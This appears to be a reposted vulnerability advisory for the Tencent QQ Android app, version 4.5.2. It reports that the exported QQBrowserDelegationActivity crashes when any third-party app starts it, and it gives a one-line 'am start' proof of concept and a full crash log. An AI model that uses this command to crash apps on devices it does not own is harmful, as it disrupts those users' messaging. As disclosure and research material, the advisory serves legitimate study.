Tencent Messenger(QQ) Dos vulnerability(critical)下载

com.tencent.mobileqq.activity.QQBrowserDelegationActivity这个activity组件可被任意第三方程序调用导致进程crash.

Process Name: com.tencent.mobileqq

Version: 4.5.2

问题包:http://pan.baidu.com/s/1lEFzo



poc:

am start -n com.tencent.mobileqq/com.tencent.mobileqq.activity.QQBrowserDelegationActivity



crash log:



 

E/AndroidRuntime( 2420): java.lang.RuntimeException: Unable to start activity ComponentInfo{com.tencent.mobileqq/com.tencent.mobileqq.activity.QQBrowserDelegationActivity}: java.lang.NullPointerException: uriString

E/AndroidRuntime( 2420):     at android.app.ActivityThread.performLaunchActivity(ActivityThread.java:1955)

E/AndroidRuntime( 2420):     at android.app.ActivityThread.handleLaunchActivity(ActivityThread.java:1980)

E/AndroidRuntime( 2420):     at android.app.ActivityThread.access$600(ActivityThread.java:122)

E/AndroidRuntime( 2420):     at android.app.ActivityThread$H.handleMessage(ActivityThread.java:1146)

E/AndroidRuntime( 2420):     at android.os.Handler.dispatchMessage(Handler.java:99)

E/AndroidRuntime( 2420):     at android.os.Looper.loop(Looper.java:137)

E/AndroidRuntime( 2420):     at android.app.ActivityThread.main(ActivityThread.java:4340)

E/AndroidRuntime( 2420):     at java.lang.reflect.Method.invokeNative(Native Method)

E/AndroidRuntime( 2420):     at java.lang.reflect.Method.invoke(Method.java:511)

E/AndroidRuntime( 2420):     at com.android.internal.os.ZygoteInit$MethodAndArgsCaller.run(ZygoteInit.java:784)

E/AndroidRuntime( 2420):     at com.android.internal.os.ZygoteInit.main(ZygoteInit.java:551)

E/AndroidRuntime( 2420):     at dalvik.system.NativeStart.main(Native Method)

E/AndroidRuntime( 2420): Caused by: java.lang.NullPointerException: uriString

E/AndroidRuntime( 2420):     at android.net.Uri$StringUri.<init>(Uri.java:464)

E/AndroidRuntime( 2420):     at android.net.Uri$StringUri.<init>(Uri.java:454)

E/AndroidRuntime( 2420):     at android.net.Uri.parse(Uri.java:426)

E/AndroidRuntime( 2420):     at com.tencent.mtt.spcialcall.sdk.MttApi.loadUrlInMbWnd(MttApi.java:68)

E/AndroidRuntime( 2420):     at com.tencent.mobileqq.activity.QQBrowserDelegationActivity.a(ProGuard:264)

E/AndroidRuntime( 2420):     at com.tencent.mobileqq.activity.QQBrowserDelegationActivity.b(ProGuard:448)

E/AndroidRuntime( 2420):     at com.tencent.mobileqq.activity.QQBrowserDelegationActivity.onCreate(ProGuard:99)

E/AndroidRuntime( 2420):     at android.app.Activity.performCreate(Activity.java:4465)

E/AndroidRuntime( 2420):     at android.app.Instrumentation.callActivityOnCreate(Instrumentation.java:1049)

E/AndroidRuntime( 2420):     at android.app.ActivityThread.performLaunchActivity(ActivityThread.java:1919)

E/AndroidRuntime( 2420):     ... 11 more

W/ActivityManager(   78):   Force finishing activity com.tencent.mobileqq/.activity.QQBrowserDelegationActivity

W/InputManagerService(   78): Window already focused, ignoring focus gain of: com.android.internal.view.IInputMethodClient$Stub$Proxy@41603f58

W/ThrottleService(   78): unable to find stats for iface rmnet0

I/WindowManager(   78): createSurface Window{414395e0  paused=false}: DRAW NOW PENDING

D/dalvikvm( 2420): GC_CONCURRENT freed 754K, 7% free 12872K/13767K, paused 4ms+17ms

W/ActivityManager(   78): Activity pause timeout for ActivityRecord{41b8a678 com.tencent.mobileqq/.activity.QQBrowserDelegationActivity}

W/NetworkManagementSocketTagger(   78): setKernelCountSet(10035, 0) failed with errno -2

D/dalvikvm( 2420): GC_CONCURRENT freed 727K, 6% free 13146K/13959K, paused 4ms+4ms

E/MSF.S.AppProcessManager( 2118): [E]can not find com.tencent.mobileqq to receive msg to:null from:FromServiceMsg msName:onRecvPushMsg ssoSeq:711488865 failCode:1000 errorMsg: uin:187224929 serviceCmd:OnlinePush.PbPushGroupMsg appId:-1 appSeq:711488865

E/MSF.S.AppProcessManager( 2118): [E]can not find com.tencent.mobileqq to receive msg to:null from:FromServiceMsg msName:onRecvPushMsg ssoSeq:711489146 failCode:1000 errorMsg: uin:187224929 serviceCmd:OnlinePush.PbPushGroupMsg appId:-1 appSeq:711489146

E/MSF.S.AppProcessManager( 2118): [E]can not find com.tencent.mobileqq to receive msg to:null from:FromServiceMsg msName:onRecvPushMsg ssoSeq:711502275 failCode:1000 errorMsg: uin:187224929 serviceCmd:OnlinePush.PbPushGroupMsg appId:-1 appSeq:711502275

W/ActivityManager(   78): Activity destroy timeout for ActivityRecord{41b8a678 com.tencent.mobileqq/.activity.QQBrowserDelegationActivity}

W/ActivityManager(   78): Timeout executing service: ServiceRecord{41a68a38 com.tencent.mobileqq/.app.GuardService}

I/ActivityManager(   78): Crashing app skipping ANR: ProcessRecord{4145d828 2420:com.tencent.mobileqq/10035} Executing service com.tencent.mobileqq/.app.GuardService

上一篇: 某通用型政府信息公开平台SQL注入漏洞下载
下一篇: 父母网某分站多处SQL注入漏洞下载
当前位置:站长啦网站目录 » 站长资讯 » 站长新闻 » 漏洞预警 » 文章详细